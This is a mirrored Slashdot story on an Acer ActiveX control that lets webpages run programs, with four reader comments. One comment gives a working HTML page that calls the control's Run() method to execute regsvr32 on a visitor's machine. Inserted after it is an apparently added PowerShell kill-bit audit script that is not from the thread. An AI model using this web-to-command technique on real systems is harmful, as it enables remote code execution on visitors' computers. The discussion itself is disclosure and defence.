Slashdot Mirror


Acer May Be Bugging Computers

tomjen writes "What if a well-known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well, Acer apparently has, and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"

4 of 396 comments

  1. Lessons learned... by Anonymous Coward · · Score: 5, Insightful

    1) Whenever possible, build your own.

    2) When you can't build your own (laptops), *always* re-install your OS after purchasing a new computer, and for God's sake use a real install CD and not the recovery one provided by the manufacturer.

  2. Re:On behalf of Acer by sunwukong · · Score: 5, Insightful

    But do you know they haven't placed a rootkit on the preinstalled Linux?

  3. Re:present on Aspire 1690 by Staale+Nordlie · · Score: 5, Insightful

    Why not just create a website that will use this vulnerability to run this "unregister" command on our machines and eliminate the vulnerability? I copied the command posted by valeurnutritive into the html demonstration code from the article. Worked just fine as far as I can tell. It has a certain poetry to it. :)

    <html>
    <body>
    <object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
    </object>
    <script>
    hahaha.Run("c", "\\windows\\system32\\regsvr32.exe -u lunchapp.ocx", "");
    </script>
    </body>
    </html>

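
A local alternative to the self-unregistering page in the comment above, as an added example that is not from the thread: audit how the control is registered and set the Internet Explorer kill bit, which keeps IE from instantiating the control even if it is registered again later. The CLSID is the one posted above; the registry paths, category GUIDs and the 0x400 flag are standard Windows/IE values, not taken from the page, and the script name is hypothetical.

```powershell
# Audit-AcerControl.ps1 (hypothetical name). Run elevated; pass -SetKillBit to apply.
param([switch]$SetKillBit)

# CLSID as posted in the comment above (stray space from the page removed).
$clsid = '{D9998BD0-7957-11D2-8FED-00606730D3AA}'

# COM component categories IE checks before letting page script use a control.
$safeCats = [ordered]@{
    '{7DD95801-9882-11CF-9FA9-00AA006C42C4}' = 'safe for scripting'
    '{7DD95802-9882-11CF-9FA9-00AA006C42C4}' = 'safe for initialization'
}

# 1. Is the control registered, which file backs it, and how is it marked?
#    The WOW6432Node path covers 32-bit registrations on 64-bit Windows.
foreach ($root in 'HKLM:\SOFTWARE\Classes\CLSID',
                  'HKLM:\SOFTWARE\WOW6432Node\Classes\CLSID') {
    $key = Join-Path $root $clsid
    if (-not (Test-Path -LiteralPath $key)) { continue }
    $srv = Get-ItemProperty -LiteralPath "$key\InprocServer32" -ErrorAction SilentlyContinue
    Write-Output "Registered under $root -> $($srv.'(default)')"
    foreach ($cat in $safeCats.Keys) {
        if (Test-Path -LiteralPath "$key\Implemented Categories\$cat") {
            Write-Output "  marked $($safeCats[$cat])"
        }
    }
}

# 2. Report (and optionally set) the kill bit: bit 0x400 of "Compatibility Flags".
$killBit = 0x400
foreach ($root in 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
                  'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility') {
    if (-not (Test-Path -LiteralPath $root)) { continue }
    $key = Join-Path $root $clsid
    $cur = 0
    if (Test-Path -LiteralPath $key) {
        $p = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue
        $cur = [int]$p.'Compatibility Flags'      # $null becomes 0
    }
    $isSet = ($cur -band $killBit) -ne 0
    Write-Output "Kill bit under ${root}: $isSet"
    if ($SetKillBit -and -not $isSet) {
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key | Out-Null }
        New-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
            -PropertyType DWord -Value ($cur -bor $killBit) -Force | Out-Null
        Write-Output "  kill bit set"
    }
}
```
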
  4. Re:@mozilla.org/process/util;1 by h2g2bob · · Score: 5, Insightful

    Exactly, that's for extensions (and the browser itself) and is protected from execution by web pages. Exploits to either Firefox or its extensions or themes can lead to pwnage (same as any internet-capable program).

    The difference between IE ActiveX and Fx extensions is that Firefox encourages you to go through addons.mozilla.org, for which all the extensions are reviewed (though I don't know how thoroughly) and update automatically (e.g. if exploits are found).